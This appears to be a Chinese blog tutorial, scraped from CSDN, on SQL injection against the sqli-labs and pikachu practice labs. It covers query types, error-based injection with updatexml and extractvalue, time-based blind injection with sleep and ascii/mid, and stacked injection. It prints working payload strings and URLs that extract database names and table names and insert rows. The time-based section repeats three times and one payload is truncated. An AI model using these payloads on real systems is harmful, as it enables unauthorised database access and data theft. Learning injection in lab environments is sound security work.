SQL注入详解(第四章查询方式及报错)

最新推荐文章于 2024-06-20 17:07:42 发布
最新推荐文章于 2024-06-20 17:07:42 发布
阅读量1.2k 收藏 1
点赞数
文章标签: sql 数据库 mysql 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52051132/article/details/126911832
版权

SQL注入第四章查询方式及报错

SQL注入之查询方式

当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显得原因可能时SQL语句查询方式问题导致,这个时候我们需要用到报错或者盲注进行后续操作,同时在注入的过程中,提前了解其中SQL语句可以更好的选择对应的注入语句。

select 查询数据

例如:在网站应用中进行数据显示查询操作

select * from user where id=$id

delete 删除数据

例如:后台管理里面删除文章删除用户等操作

delete from user where id=$id

insert 插入数据

例如:在网站应用中进行用户注册添加操作

inser into user (id,name,pass) values(1,'zhangsan','1234')

update 更新数据

例如:后台中心数据同步或者缓存操作

update user set pwd='p' where id=1

SQL注入 报错盲注

盲注就是在注入的过程中,获取的数据不能显示到前端页面,此时,我们需要利用一些方法进行判断或者尝试,我们称之为盲注。我们可以知道盲注分为以下三类:

1.基于布尔的SQL盲注 - 逻辑判断

regexp like ascii left ord mid

2.基于时间的SQL盲注 - 延时判断

if sleep

3.基于报错的SQL盲注 - 报错回显(强制性报错 )

函数解析:

updatexml():从目标XML中更改包含所查询值的字符串

第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC

第二个参数:XPath_string(Xpath格式字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

updatexml(XML_document,XPath_String,new_value);

‘or updatexml(1,concat(0x7e,database()),0)or’

extractvalue():从目标XML中返回包含所查询值的字符串

第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC

第二个参数:XPath_String (Xpath格式字符串)

extractvalue(XML_document,XPath_String)

’ or extractvalue(1,concat(0x7e,database())) or’

’ union select 1,extractvalue(1,concat(0x7e,(select version())))%23

函数应用:

image.png

image.png

floor()向下取整 floor(10.5) = 10
rand()随机数 0 ~ 1之间
count(*)函数返回表的记录数。
concat函数:将多个字符串连接成一个字符串
group_by 根据by对数据按照哪个字段、进行分组,或者是哪几个字段进行分组(去重)。
会建立一张临时表
注意:多个字段分组要使用某个列的聚合函数 cout sum等

pikachu insert

username=x’ or (select 1 from (select count(*),concat((select))

基于时间的SQL盲注 - 延时注入

知识储备:

sleep(): Sleep 函数可以使计算机程序(进程,任务或线程)进入休眠

if(): i f 是 计算机编程语言一个关键字,分支结构的一种

mid(a,b,c): 从b开始,截取a字符串的c位

substr(a,b,c): 从b开始,截取字符串a的c长度

left(database(),1),database() : left(a,b)从左侧截取a的前b位

length(database())=8 : 判断长度

ord=ascii ascii(x)=100: 判断x的ascii值是否为100

在不使用sleep下查询数据所需要的时间:0.03秒

image.png

使用sleep可以使查询数据休眠指定时间

image.png

if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c

image.png

使用if与sleep结合使用:image.png

达到延时数据显示,从而通过数据显示的时间判断数据对错!

使用靶场less-2来实现延时注入:

ocalhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(database()=%27test%27,0,5))

image.png

可以通过length()来判断数据库的长度

http://localhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(length(database())=8,8,0))

image.png

image.png

mid()使用:

image.png

substr()函数
Substr()和substring()函数实现的功能是一样的,均为截取字符串。

string substring(string, start, length)
string substr(string, start, length)
参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

substr()函数使用:

image.png

Left()函数

Left()得到字符串左部指定个数的字符

Left ( string, n ) string为要截取的字符串,n为长度。

image.png

通过以上函数可以来判断数据信息:

http://localhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(mid(database(),1,1)=%27t%27,0,5))

image.png

推荐使用ASCII码

1.防止引号 ‘ “ 转义

2.方便以后工具的使用

使用ascii函数()

image.png

结合场景使用:

select * from t1 where id=1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=120,sleep(3),0);

select * from t1 where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116,sleep(2),0);

基于时间的SQL盲注 - 延时注入

知识储备:

sleep(): Sleep 函数可以使计算机程序(进程,任务或线程)进入休眠

if(): i f 是 计算机编程语言一个关键字,分支结构的一种

mid(a,b,c): 从b开始,截取a字符串的c位

substr(a,b,c): 从b开始,截取字符串a的c长度

left(database(),1),database() : left(a,b)从左侧截取a的前b位

length(database())=8 : 判断长度

ord=ascii ascii(x)=100: 判断x的ascii值是否为100

在不使用sleep下查询数据所需要的时间:0.03秒

image.png

使用sleep可以使查询数据休眠指定时间

image.png

if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c

image.png

使用if与sleep结合使用:image.png

达到延时数据显示,从而通过数据显示的时间判断数据对错!

使用靶场less-2来实现延时注入:

ocalhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(database()=%27test%27,0,5))

image.png

可以通过length()来判断数据库的长度

http://localhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(length(database())=8,8,0))

image.png

image.png

mid()使用:

image.png

substr()函数
Substr()和substring()函数实现的功能是一样的,均为截取字符串。

string substring(string, start, length)
string substr(string, start, length)
参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

substr()函数使用:

image.png

Left()函数

Left()得到字符串左部指定个数的字符

Left ( string, n ) string为要截取的字符串,n为长度。

image.png

通过以上函数可以来判断数据信息:

http://localhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(mid(database(),1,1)=%27t%27,0,5))

image.png

推荐使用ASCII码

1.防止引号 ‘ “ 转义

2.方便以后工具的使用

使用ascii函数()

image.png

结合场景使用:

select * from t1 where id=1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=120,sleep(3),0);

select * from t1 where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116,sleep(2),0);

基于时间的SQL盲注 - 延时注入

知识储备:

sleep(): Sleep 函数可以使计算机程序(进程,任务或线程)进入休眠

if(): i f 是 计算机编程语言一个关键字,分支结构的一种

mid(a,b,c): 从b开始,截取a字符串的c位

substr(a,b,c): 从b开始,截取字符串a的c长度

left(database(),1),database() : left(a,b)从左侧截取a的前b位

length(database())=8 : 判断长度

ord=ascii ascii(x)=100: 判断x的ascii值是否为100

在不使用sleep下查询数据所需要的时间:0.03秒

image.png

使用sleep可以使查询数据休眠指定时间

image.png

if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c

image.png

使用if与sleep结合使用:image.png

达到延时数据显示,从而通过数据显示的时间判断数据对错!

使用靶场less-2来实现延时注入:

ocalhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(database()=%27test%27,0,5))

image.png

可以通过length()来判断数据库的长度

http://localhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(length(database())=8,8,0))

image.png

image.png

mid()使用:

image.png

substr()函数
Substr()和substring()函数实现的功能是一样的,均为截取字符串。

string substring(string, start, length)
string substr(string, start, length)
参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

substr()函数使用:

image.png

Left()函数

Left()得到字符串左部指定个数的字符

Left ( string, n ) string为要截取的字符串,n为长度。

image.png

通过以上函数可以来判断数据信息:

http://localhost/sqli-labs-master/Less-2/index.php?id=1%20and%20sleep(if(mid(database(),1,1)=%27t%27,0,5))

image.png

推荐使用ASCII码

1.防止引号 ‘ “ 转义

2.方便以后工具的使用

使用ascii函数()

image.png

结合场景使用:

select * from t1 where id=1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=120,sleep(3),0);

select * from t1 where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116,sleep(2),0);

SQL注入之堆叠注入

在SQL中,分号 ;是用来表示一条sql语句的结束,试想一下我们在 ; 结束一个sql语句后面继续构造下一个语句
会不会一起执行?因此这个想法也就造就了堆叠注入。

image.png

image.png

而union injection(联合注入)也是将两条语句合并在一起
两者之间有什么区别?区别就在于union执行语句类型有限,可以用来执行查询语句,而堆叠注入可以执行的是任意语句

Less-38

http://localhost/sqli-labs-master/Less-38/?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2722%27,%27mc%27,%27hello%27)–+

image.png

爱睡觉的扬扬
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1313
SQLI第四关
SQL注入(四)
weixin_34343000的博客
05-06 78
参数绑定(预编译语句) 虽然数据库自带的过滤是个不错的实现,但是我们还是处在“用户输入被当成 SQL语句的一部分 ”这么个圈子里,其实要跳出这个圈子还有一个实现,就是参数绑定。基本上所有的主流数据库都提供这种接口。这种方法提前预编译了SQL语句的逻辑,然后对 参数预留了位置(就是“ ?1  ?2” 这种的)。这样语句在执行的时候只是按照输入的参数表来执行。 Perl环境的例子: $sth...
手工操作几种常见SQL注入
最新发布
X1DD1Asad343的博客
06-20 998
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库查询的结果能够直接在前端页面中展示出来。
sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第四关Less-4)
u013630181的博客
07-05 173
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
SQL注入闯关第二关---第四关
qq_54037445的博客
10-06 1480
sqlilab,sql注入闯关第二关到第四关详细讲解
web安全SQL注入---第四章 如何进行SQL注入攻击
weixin_34217773的博客
08-22 109
第四章 如何进行SQL注入攻击1.数字注入2.字符串注入 '# '-- 转载于:https://www.cnblogs.com/Worssmagee1002/p/7412039.html
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入思路详解
12-14
3. **确认注入的存在及类型**:如果测试语句产生了预期的异常或改变了原有查询的结果,那么就可能存在SQL注入。接下来,攻击者会尝试确定数据库类型,因为不同的数据库系统对SQL语法的响应和错误处理是不同的。这...
第五篇:Bypass 护卫神SQL注入防御(多姿势)1
08-03
本文主要探讨了如何绕过护卫神·入侵防护系统的SQL注入防御,提供了多种策略和技巧。护卫神是一款专注于服务器安全的产品,其SQL防注入功能旨在保护服务器免受SQL注入攻击。以下是对每种Bypass方法的详细解释: 1. ...
第十三节 Sqlmap注入技术参数1-01
09-15
默认情况下,Sqlmap测试使用1到10列的UNION查询SQL注入技术。但是,通过提供更高level值,可以将此范围增加到50列。 例如,使用以下命令可以设置UNION字段数为12到18: ``` sqlmap -u “存在注入的URL” --union-...
Linq To Sql进阶系列
11-09
- **动态SQL构建**:传统的方法是手动拼接SQL字符串来实现动态查询,但这很容易导致SQL注入等问题。 - **Linq To Sql动态查询**:Linq To Sql提供了强大的动态查询能力,允许开发者使用对象来构建查询条件,从而避免...
基于Sqli-Labs靶场的SQL注入-1~4关
Joker
11-11 1638
这里对SQL进行了初步的讲解,主要讲解了联合注入以及一些简单的注入类型判断,后续我会更新其他系列的注入方式,例如报错注入、二分法猜解注入、时间延迟注入、导出文件字符型注入、POST类型注入等注入类型。
SQL注入查询注入)
m0_61974571的博客
10-12 1741
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.csdn.net/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
SQL注入
qq_63785498的博客
06-10 2383
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
SQL注入查询方式及盲注)
qi_SJQ_的博客
11-09 1596
很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作。 sql语句增删改查: 比如:insert注入可以用于用户注册时插入到数据库中。 ...
sql注入 联合查询
m0_70892020的博客
05-23 384
sql注入 联合查询
sqli-labs---第四关
2201_75556700的博客
05-22 297
6、查询用户名和密码字段的值 ,用id分隔开方便观看。4、查询表名(有4张表,我们查询users这张表)3、查询数据库名(库名为security)可判断为字符型闭合,")为闭合方式。2、查询列数,判断回显位置。5、查询users表中字段。id=1'(正常回显)id=1(正常回显)
SQLI-labs-第四关
weixin_54055099的博客
09-04 677
SQLI第四关的思路跟步骤
SQL注入详解查询方式报错盲注与实战技巧
"本文介绍了WEB漏洞中的SQL注入问题,特别是针对查询方式报错盲注的技巧。内容包括Access偏移注入、SQL语句的基本查询、插入、删除和更新操作,以及不同类型的SQL盲注方法,如布尔盲注、时间盲注和报错盲注。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值